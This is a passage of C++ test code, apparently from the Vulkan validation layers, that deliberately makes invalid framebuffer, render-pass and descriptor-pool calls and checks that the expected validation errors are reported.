VK_STRUCTURE_TYPE_RENDER_PASS_BEGIN_INFO; rpbi.framebuffer = m_framebuffer; rpbi.renderPass = rp; m_commandBuffer->BeginRenderPass(rpbi); m_commandBuffer->EndRenderPass(); m_commandBuffer->end(); VkSubmitInfo submit_info = {}; submit_info.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO; submit_info.commandBufferCount = 1; submit_info.pCommandBuffers = &m_commandBuffer->handle(); vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); m_errorMonitor->VerifyNotFound(); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkDestroyRenderPass-renderPass-00873"); vk::DestroyRenderPass(m_device->device(), rp, nullptr); m_errorMonitor->VerifyFound(); // Wait for queue to complete so we can safely destroy rp vk::QueueWaitIdle(m_device->m_queue); m_errorMonitor->SetUnexpectedError("If renderPass is not VK_NULL_HANDLE, renderPass must be a valid VkRenderPass handle"); m_errorMonitor->SetUnexpectedError("Was it created? Has it already been destroyed?"); vk::DestroyRenderPass(m_device->device(), rp, nullptr); } TEST_F(VkLayerTest, FramebufferCreateErrors) { TEST_DESCRIPTION( "Hit errors when attempting to create a framebuffer :\n" " 1. Mismatch between framebuffer & renderPass attachmentCount\n" " 2. Use a color image as depthStencil attachment\n" " 3. Mismatch framebuffer & renderPass attachment formats\n" " 4. Mismatch framebuffer & renderPass attachment #samples\n" " 5. Framebuffer attachment w/ non-1 mip-levels\n" " 6. Framebuffer with more than 1 layer with a multiview renderpass\n" " 7. Framebuffer attachment where dimensions don't match\n" " 8. Framebuffer attachment where dimensions don't match\n" " 9. Framebuffer attachment w/o identity swizzle\n" " 10. framebuffer dimensions exceed physical device limits\n" " 11. null pAttachments\n"); // Check for VK_KHR_get_physical_device_properties2 bool push_physical_device_properties_2_support = InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); if (push_physical_device_properties_2_support) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool push_fragment_density_support = false; if (push_physical_device_properties_2_support) { push_fragment_density_support = DeviceExtensionSupported(gpu(), nullptr, VK_EXT_FRAGMENT_DENSITY_MAP_EXTENSION_NAME); if (push_fragment_density_support) m_device_extension_names.push_back(VK_EXT_FRAGMENT_DENSITY_MAP_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitState(nullptr, nullptr, 0)); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-attachmentCount-00876"); bool rp2_supported = CheckCreateRenderPass2Support(this, m_device_extension_names); bool multiviewSupported = rp2_supported || (m_device->props.apiVersion >= VK_API_VERSION_1_1); if (!multiviewSupported && DeviceExtensionSupported(gpu(), nullptr, VK_KHR_MULTIVIEW_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_KHR_MULTIVIEW_EXTENSION_NAME); multiviewSupported = true; } // Create a renderPass with a single color attachment VkAttachmentReference attach = {}; attach.layout = VK_IMAGE_LAYOUT_GENERAL; VkSubpassDescription subpass = {}; subpass.pColorAttachments = &attach; VkRenderPassCreateInfo rpci = {}; rpci.subpassCount = 1; rpci.pSubpasses = &subpass; rpci.attachmentCount = 1; VkAttachmentDescription attach_desc = {}; attach_desc.format = VK_FORMAT_B8G8R8A8_UNORM; attach_desc.samples = VK_SAMPLE_COUNT_1_BIT; attach_desc.finalLayout = VK_IMAGE_LAYOUT_GENERAL; rpci.pAttachments = &attach_desc; rpci.sType = VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO; VkRenderPass rp; VkResult err = vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp); ASSERT_VK_SUCCESS(err); VkImageView ivs[2]; ivs[0] = m_renderTargets[0]->targetView(VK_FORMAT_B8G8R8A8_UNORM); ivs[1] = m_renderTargets[0]->targetView(VK_FORMAT_B8G8R8A8_UNORM); VkFramebufferCreateInfo fb_info = {}; fb_info.sType = VK_STRUCTURE_TYPE_FRAMEBUFFER_CREATE_INFO; fb_info.pNext = NULL; fb_info.renderPass = rp; // Set mis-matching attachmentCount fb_info.attachmentCount = 2; fb_info.pAttachments = ivs; fb_info.width = 100; fb_info.height = 100; fb_info.layers = 1; VkFramebuffer fb; err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } vk::DestroyRenderPass(m_device->device(), rp, NULL); // Create a renderPass with a depth-stencil attachment created with // IMAGE_USAGE_COLOR_ATTACHMENT // Add our color attachment to pDepthStencilAttachment subpass.pDepthStencilAttachment = &attach; subpass.pColorAttachments = NULL; VkRenderPass rp_ds; err = vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp_ds); ASSERT_VK_SUCCESS(err); // Set correct attachment count, but attachment has COLOR usage bit set fb_info.attachmentCount = 1; fb_info.renderPass = rp_ds; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-pAttachments-02633"); err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } vk::DestroyRenderPass(m_device->device(), rp_ds, NULL); // Create new renderpass with alternate attachment format from fb attach_desc.format = VK_FORMAT_R8G8B8A8_UNORM; subpass.pDepthStencilAttachment = NULL; subpass.pColorAttachments = &attach; err = vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp); ASSERT_VK_SUCCESS(err); // Cause error due to mis-matched formats between rp & fb // rp attachment 0 now has RGBA8 but corresponding fb attach is BGRA8 fb_info.renderPass = rp; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-pAttachments-00880"); err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } vk::DestroyRenderPass(m_device->device(), rp, NULL); // Create new renderpass with alternate sample count from fb attach_desc.format = VK_FORMAT_B8G8R8A8_UNORM; attach_desc.samples = VK_SAMPLE_COUNT_4_BIT; err = vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp); ASSERT_VK_SUCCESS(err); // Cause error due to mis-matched sample count between rp & fb fb_info.renderPass = rp; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-pAttachments-00881"); err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } vk::DestroyRenderPass(m_device->device(), rp, NULL); { // Create an image with 2 mip levels. VkImageObj image(m_device); image.Init(128, 128, 2, VK_FORMAT_B8G8R8A8_UNORM, VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT, VK_IMAGE_TILING_OPTIMAL, 0); ASSERT_TRUE(image.initialized()); // Create a image view with two mip levels. VkImageView view; VkImageViewCreateInfo ivci = {}; ivci.sType = VK_STRUCTURE_TYPE_IMAGE_VIEW_CREATE_INFO; ivci.image = image.handle(); ivci.viewType = VK_IMAGE_VIEW_TYPE_2D; ivci.format = VK_FORMAT_B8G8R8A8_UNORM; ivci.subresourceRange.layerCount = 1; ivci.subresourceRange.baseMipLevel = 0; // Set level count to 2 (only 1 is allowed for FB attachment) ivci.subresourceRange.levelCount = 2; ivci.subresourceRange.aspectMask = VK_IMAGE_ASPECT_COLOR_BIT; err = vk::CreateImageView(m_device->device(), &ivci, NULL, &view); ASSERT_VK_SUCCESS(err); // Re-create renderpass to have matching sample count attach_desc.samples = VK_SAMPLE_COUNT_1_BIT; err = vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp); ASSERT_VK_SUCCESS(err); fb_info.renderPass = rp; fb_info.pAttachments = &view; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-pAttachments-00883"); err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } vk::DestroyImageView(m_device->device(), view, NULL); } // Update view to original color buffer and grow FB dimensions too big fb_info.pAttachments = ivs; fb_info.height = 1024; fb_info.width = 1024; fb_info.layers = 2; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-pAttachments-00882"); err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } { if (!push_fragment_density_support) { printf("%s VK_EXT_fragment_density_map Extension not supported, skipping tests\n", kSkipPrefix); } else { uint32_t attachment_width = 512; uint32_t attachment_height = 512; VkFormat attachment_format = VK_FORMAT_R8G8_UNORM; uint32_t frame_width = 512; uint32_t frame_height = 512; // Create a renderPass with a single color attachment for fragment density map VkAttachmentReference attach_fragment_density_map = {}; attach_fragment_density_map.layout = VK_IMAGE_LAYOUT_GENERAL; VkSubpassDescription subpass_fragment_density_map = {}; subpass_fragment_density_map.pColorAttachments = &attach_fragment_density_map; VkRenderPassCreateInfo rpci_fragment_density_map = {}; rpci_fragment_density_map.subpassCount = 1; rpci_fragment_density_map.pSubpasses = &subpass_fragment_density_map; rpci_fragment_density_map.attachmentCount = 1; VkAttachmentDescription attach_desc_fragment_density_map = {}; attach_desc_fragment_density_map.format = attachment_format; attach_desc_fragment_density_map.samples = VK_SAMPLE_COUNT_1_BIT; attach_desc_fragment_density_map.finalLayout = VK_IMAGE_LAYOUT_FRAGMENT_DENSITY_MAP_OPTIMAL_EXT; rpci_fragment_density_map.pAttachments = &attach_desc_fragment_density_map; rpci_fragment_density_map.sType = VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO; VkRenderPass rp_fragment_density_map; err = vk::CreateRenderPass(m_device->device(), &rpci_fragment_density_map, NULL, &rp_fragment_density_map); ASSERT_VK_SUCCESS(err); // Create view attachment VkImageView view_fragment_density_map; VkImageViewCreateInfo ivci = {}; ivci.sType = VK_STRUCTURE_TYPE_IMAGE_VIEW_CREATE_INFO; ivci.viewType = VK_IMAGE_VIEW_TYPE_2D; ivci.format = attachment_format; ivci.flags = 0; ivci.subresourceRange.layerCount = 1; ivci.subresourceRange.baseMipLevel = 0; ivci.subresourceRange.levelCount = 1; ivci.subresourceRange.aspectMask = VK_IMAGE_ASPECT_COLOR_BIT; VkFramebufferAttachmentImageInfoKHR fb_fdm = {}; fb_fdm.sType = VK_STRUCTURE_TYPE_FRAMEBUFFER_ATTACHMENT_IMAGE_INFO_KHR; fb_fdm.usage = VK_IMAGE_USAGE_FRAGMENT_DENSITY_MAP_BIT_EXT; fb_fdm.width = frame_width; fb_fdm.height = frame_height; fb_fdm.layerCount = 1; fb_fdm.viewFormatCount = 1; fb_fdm.pViewFormats = &attachment_format; VkFramebufferAttachmentsCreateInfoKHR fb_aci_fdm = {}; fb_aci_fdm.sType = VK_STRUCTURE_TYPE_FRAMEBUFFER_ATTACHMENTS_CREATE_INFO_KHR; fb_aci_fdm.attachmentImageInfoCount = 1; fb_aci_fdm.pAttachmentImageInfos = &fb_fdm; VkFramebufferCreateInfo fbci = {}; fbci.sType = VK_STRUCTURE_TYPE_FRAMEBUFFER_CREATE_INFO; fbci.pNext = &fb_aci_fdm; fbci.flags = 0; fbci.width = frame_width; fbci.height = frame_height; fbci.layers = 1; fbci.renderPass = rp_fragment_density_map; fbci.attachmentCount = 1; fbci.pAttachments = &view_fragment_density_map; // Set small width VkImageObj image2(m_device); image2.Init(16, attachment_height, 1, attachment_format, VK_IMAGE_USAGE_FRAGMENT_DENSITY_MAP_BIT_EXT, VK_IMAGE_TILING_LINEAR, 0); ASSERT_TRUE(image2.initialized()); ivci.image = image2.handle(); err = vk::CreateImageView(m_device->device(), &ivci, NULL, &view_fragment_density_map); ASSERT_VK_SUCCESS(err); fbci.pAttachments = &view_fragment_density_map; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-pAttachments-02555"); err = vk::CreateFramebuffer(device(), &fbci, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } vk::DestroyImageView(m_device->device(), view_fragment_density_map, NULL); // Set small height VkImageObj image3(m_device); image3.Init(attachment_width, 16, 1, attachment_format, VK_IMAGE_USAGE_FRAGMENT_DENSITY_MAP_BIT_EXT, VK_IMAGE_TILING_LINEAR, 0); ASSERT_TRUE(image3.initialized()); ivci.image = image3.handle(); err = vk::CreateImageView(m_device->device(), &ivci, NULL, &view_fragment_density_map); ASSERT_VK_SUCCESS(err); fbci.pAttachments = &view_fragment_density_map; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-pAttachments-02556"); err = vk::CreateFramebuffer(device(), &fbci, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } vk::DestroyImageView(m_device->device(), view_fragment_density_map, NULL); vk::DestroyRenderPass(m_device->device(), rp_fragment_density_map, NULL); } } { // Create an image with one mip level. VkImageObj image(m_device); image.Init(128, 128, 1, VK_FORMAT_B8G8R8A8_UNORM, VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT, VK_IMAGE_TILING_OPTIMAL, 0); ASSERT_TRUE(image.initialized()); // Create view attachment with non-identity swizzle VkImageView view; VkImageViewCreateInfo ivci = {}; ivci.sType = VK_STRUCTURE_TYPE_IMAGE_VIEW_CREATE_INFO; ivci.image = image.handle(); ivci.viewType = VK_IMAGE_VIEW_TYPE_2D; ivci.format = VK_FORMAT_B8G8R8A8_UNORM; ivci.subresourceRange.layerCount = 1; ivci.subresourceRange.baseMipLevel = 0; ivci.subresourceRange.levelCount = 1; ivci.subresourceRange.aspectMask = VK_IMAGE_ASPECT_COLOR_BIT; ivci.components.r = VK_COMPONENT_SWIZZLE_G; ivci.components.g = VK_COMPONENT_SWIZZLE_R; ivci.components.b = VK_COMPONENT_SWIZZLE_A; ivci.components.a = VK_COMPONENT_SWIZZLE_B; err = vk::CreateImageView(m_device->device(), &ivci, NULL, &view); ASSERT_VK_SUCCESS(err); fb_info.pAttachments = &view; fb_info.height = 100; fb_info.width = 100; fb_info.layers = 1; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-pAttachments-00884"); err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } vk::DestroyImageView(m_device->device(), view, NULL); } { if (!multiviewSupported) { printf("%s VK_KHR_Multiview Extension not supported, skipping tests\n", kSkipPrefix); } else { // Test multiview renderpass with more than 1 layer uint32_t viewMasks[] = {0x3u}; VkRenderPassMultiviewCreateInfo rpmvci = { VK_STRUCTURE_TYPE_RENDER_PASS_MULTIVIEW_CREATE_INFO, nullptr, 1, viewMasks, 0, nullptr, 0, nullptr}; VkRenderPassCreateInfo rpci_mv = { VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, &rpmvci, 0, 0, nullptr, 1, &subpass, 0, nullptr}; VkRenderPass rp_mv; err = vk::CreateRenderPass(m_device->device(), &rpci_mv, NULL, &rp_mv); ASSERT_VK_SUCCESS(err); VkFramebufferCreateInfo fb_info_mv = fb_info; fb_info_mv.layers = 2; fb_info_mv.attachmentCount = 0; fb_info_mv.renderPass = rp_mv; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-renderPass-02531"); err = vk::CreateFramebuffer(device(), &fb_info_mv, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } vk::DestroyRenderPass(m_device->device(), rp_mv, NULL); } } // reset attachment to color attachment fb_info.pAttachments = ivs; // Request fb that exceeds max width fb_info.width = m_device->props.limits.maxFramebufferWidth + 1; fb_info.height = 100; fb_info.layers = 1; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-width-00886"); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-pAttachments-00882"); err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } // and width=0 fb_info.width = 0; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-width-00885"); err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } // Request fb that exceeds max height fb_info.width = 100; fb_info.height = m_device->props.limits.maxFramebufferHeight + 1; fb_info.layers = 1; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-height-00888"); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-pAttachments-00882"); err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } // and height=0 fb_info.height = 0; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-height-00887"); err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } // Request fb that exceeds max layers fb_info.width = 100; fb_info.height = 100; fb_info.layers = m_device->props.limits.maxFramebufferLayers + 1; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-layers-00890"); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-pAttachments-00882"); err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } // and layers=0 fb_info.layers = 0; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-layers-00889"); err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } // Try to create with pAttachments = NULL fb_info.layers = 1; fb_info.pAttachments = NULL; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID_Undefined"); err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } vk::DestroyRenderPass(m_device->device(), rp, NULL); } TEST_F(VkLayerTest, AllocDescriptorFromEmptyPool) { TEST_DESCRIPTION("Attempt to allocate more sets and descriptors than descriptor pool has available."); VkResult err; ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); // This test is valid for Vulkan 1.0 only -- skip if device has an API version greater than 1.0. if (m_device->props.apiVersion >= VK_API_VERSION_1_1) { printf("%s Device has apiVersion greater than 1.0 -- skipping Descriptor Set checks.\n", kSkipPrefix); return; } // Create Pool w/ 1 Sampler descriptor, but try to alloc Uniform Buffer // descriptor from it VkDescriptorPoolSize ds_type_count = {}; ds_type_count.type = VK_DESCRIPTOR_TYPE_SAMPLER; ds_type_count.descriptorCount = 2; VkDescriptorPoolCreateInfo ds_pool_ci = {}; ds_pool_ci.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_POOL_CREATE_INFO; ds_pool_ci.pNext = NULL; ds_pool_ci.flags = 0; ds_pool_ci.maxSets = 1; ds_pool_ci.poolSizeCount = 1; ds_pool_ci.pPoolSizes = &ds_type_count; VkDescriptorPool ds_pool; err = vk::CreateDescriptorPool(m_device->device(), &ds_pool_ci, NULL, &ds_pool); ASSERT_VK_SUCCESS(err); VkDescriptorSetLayoutBinding dsl_binding_samp = {}; dsl_binding_samp.binding = 0; dsl_binding_samp.descriptorType = VK_DESCRIPTOR_TYPE_SAMPLER; dsl_binding_samp.descriptorCount = 1; dsl_binding_samp.stageFlags = VK_SHADER_STAGE_ALL; dsl_binding_samp.pImmutableSamplers = NULL; const VkDescriptorSetLayoutObj ds_layout_samp(m_device, {dsl_binding_samp}); // Try to allocate 2 sets when pool only has 1 set VkDescriptorSet descriptor_sets[2]; VkDescriptorSetLayout set_layouts[2] = {ds_layout_samp.handle(), ds_layout_samp.handle()}; VkDescriptorSetAllocateInfo alloc_info = {}; alloc_info.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_SET_ALLOCATE_INFO; alloc_info.descriptorSetCount = 2; alloc_info.descriptorPool = ds_pool; alloc_info.pSetLayouts = set_layouts; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorSetAllocateInfo-descriptorSetCount-00306"); err = vk::AllocateDescriptorSets(m_device->device(), &alloc_info, descriptor_sets); m_errorMonitor->VerifyFound(); alloc_info.descriptorSetCount = 1; // Create layout w/ descriptor type not available in pool VkDescriptorSetLayoutBinding dsl_binding = {}; dsl_binding.binding = 0; dsl_binding.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; dsl_binding.descriptorCount = 1; dsl_binding.stageFlags = VK_SHADER_STAGE_ALL; dsl_binding.pImmutableSamplers = NULL; const VkDescriptorSetLayoutObj ds_layout_ub(m_device, {dsl_binding}); VkDescriptorSet descriptor_set; alloc_info.descriptorSetCount = 1; alloc_info.pSetLayouts = &ds_layout_ub.handle(); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorSetAllocateInfo-descriptorPool-00307"); err = vk::AllocateDescriptorSets(m_device->device(), &alloc_info, &descriptor_set); m_errorMonitor->VerifyFound(); vk::DestroyDescriptorPool(m_device->device(), ds_pool, NULL); } TEST_F(VkLayerTest, FreeDescriptorFromOneShotPool) { VkResult err; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkFreeDescriptorSets-descriptorPool-00312"); ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); VkDescriptorPoolSize ds_type_count = {}; ds_type_count.type = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; ds_type_count.descriptorCount = 1; VkDescriptorPoolCreateInfo ds_pool_ci = {}; ds_pool_ci.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_POOL_CREATE_INFO; ds_pool_ci.pNext = NULL; ds_pool_ci.maxSets = 1; ds_pool_ci.poolSizeCount = 1; ds_pool_ci.flags = 0; // Not specifying VK_DESCRIPTOR_POOL_CREATE_FREE_DESCRIPTOR_SET_BIT means // app can only call vk::ResetDescriptorPool on this pool.; ds_pool_ci.pPoolSizes = &ds_type_count; VkDescriptorPool ds_pool; err = vk::CreateDescriptorPool(m_device->device(), &ds_pool_ci, NULL, &ds_pool); ASSERT_VK_SUCCESS(err); VkDescriptorSetLayoutBinding dsl_binding = {}; dsl_binding.binding = 0; dsl_binding.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; dsl_binding.descriptorCount = 1; dsl_binding.stageFlags = VK_SHADER_STAGE_ALL; dsl_binding.pImmutableSamplers = NULL; const VkDescriptorSetLayoutObj ds_layout(m_device, {dsl_binding}); VkDescriptorSet descriptorSet; VkDescriptorSetAllocateInfo alloc_info = {}; alloc_info.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_SET_ALLOCATE_INFO; alloc_info.descriptorSetCount = 1; alloc_info.descriptorPool = ds_pool; alloc_info.pSetLayouts = &ds_layout.handle(); err = vk::AllocateDescriptorSets(m_device->device(), &alloc_info, &descriptorSet); ASSERT_VK_SUCCESS(err); err = vk::FreeDescriptorSets(m_device->device(), ds_pool, 1, &descriptorSet); m_errorMonitor->VerifyFound(); vk::DestroyDescriptorPool(m_device->device(), ds_pool, NULL); } TEST_F(VkLayerTest, InvalidDescriptorPool) { // Attempt to clear Descriptor Pool with bad object. // ObjectTracker should catch this. ASSERT_NO_FATAL_FAILURE(Init()); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkResetDescriptorPool-descriptorPool-parameter"); uint64_t fake_pool_handle = 0xbaad6001; VkDescriptorPool bad_pool = reinterpret_cast<VkDescriptorPool &>(fake_pool_handle); vk::ResetDescriptorPool(device(), bad_pool, 0); m_errorMonitor->VerifyFound(); } TEST_F(VkLayerTest, InvalidDescriptorSet) { // Attempt to bind an invalid Descriptor Set to a valid Command Buffer // ObjectTracker should catch this. // Create a valid cmd buffer // call vk::CmdBindDescriptorSets w/ false Descriptor Set uint64_t fake_set_handle = 0xbaad6001; VkDescriptorSet bad_set = reinterpret_cast<VkDescriptorSet &>(fake_set_handle); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkCmdBindDescriptorSets-pDescriptorSets-parameter"); ASSERT_NO_FATAL_FAILURE(Init()); VkDescriptorSetLayoutBinding layout_binding = {}; layout_binding.binding = 0; layout_binding.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; layout_binding.descriptorCount = 1; layout_binding.stageFlags = VK_SHADER_STAGE_VERTEX_BIT; layout_binding.pImmutableSamplers = NULL; const VkDescriptorSetLayoutObj descriptor_set_layout(m_device, {layout_binding}); const VkPipelineLayoutObj pipeline_layout(DeviceObj(), {&descriptor_set_layout}); m_commandBuffer->begin(); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 1, &bad_set, 0, NULL); m_errorMonitor->VerifyFound(); m_commandBuffer->end(); } TEST_F(VkLayerTest, InvalidDescriptorSetLayout) { // Attempt to create a Pipeline Layout with an invalid Descriptor Set Layout. // ObjectTracker should catch this. uint64_t fake_layout_handle = 0xbaad6001; VkDescriptorSetLayout bad_layout = reinterpret_cast<VkDescriptorSetLayout &>(fake_layout_handle); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkPipelineLayoutCreateInfo-pSetLayouts-parameter"); ASSERT_NO_FATAL_FAILURE(Init()); VkPipelineLayout pipeline_layout; VkPipelineLayoutCreateInfo plci = {}; plci.sType = VK_STRUCTURE_TYPE_PIPELINE_LAYOUT_CREATE_INFO; plci.pNext = NULL; plci.setLayoutCount = 1; plci.pSetLayouts = &bad_layout; vk::CreatePipelineLayout(device(), &plci, NULL, &pipeline_layout); m_errorMonitor->VerifyFound(); } TEST_F(VkLayerTest, WriteDescriptorSetIntegrityCheck) { TEST_DESCRIPTION( "This test verifies some requirements of chapter 13.2.3 of the Vulkan Spec " "1) A uniform buffer update must have a valid buffer index. " "2) When using an array of descriptors in a single WriteDescriptor, the descriptor types and stageflags " "must all be the same. " "3) Immutable Sampler state must match across descriptors. " "4) That sampled image descriptors have required layouts. " "5) That it is prohibited to write to an immutable sampler. "); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-descriptorType-00324"); ASSERT_NO_FATAL_FAILURE(Init()); VkSamplerCreateInfo sampler_ci = SafeSaneSamplerCreateInfo(); VkSampler sampler; VkResult err = vk::CreateSampler(m_device->device(), &sampler_ci, NULL, &sampler); ASSERT_VK_SUCCESS(err); OneOffDescriptorSet::Bindings bindings = { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, NULL}, {1, VK_DESCRIPTOR_TYPE_SAMPLER, 1, VK_SHADER_STAGE_FRAGMENT_BIT, NULL}, {2, VK_DESCRIPTOR_TYPE_SAMPLER, 1, VK_SHADER_STAGE_FRAGMENT_BIT, static_cast<VkSampler *>(&sampler)}, {3, VK_DESCRIPTOR_TYPE_SAMPLED_IMAGE, 1, VK_SHADER_STAGE_FRAGMENT_BIT, NULL}}; OneOffDescriptorSet descriptor_set(m_device, bindings); ASSERT_TRUE(descriptor_set.Initialized()); VkWriteDescriptorSet descriptor_write = {}; descriptor_write.sType = 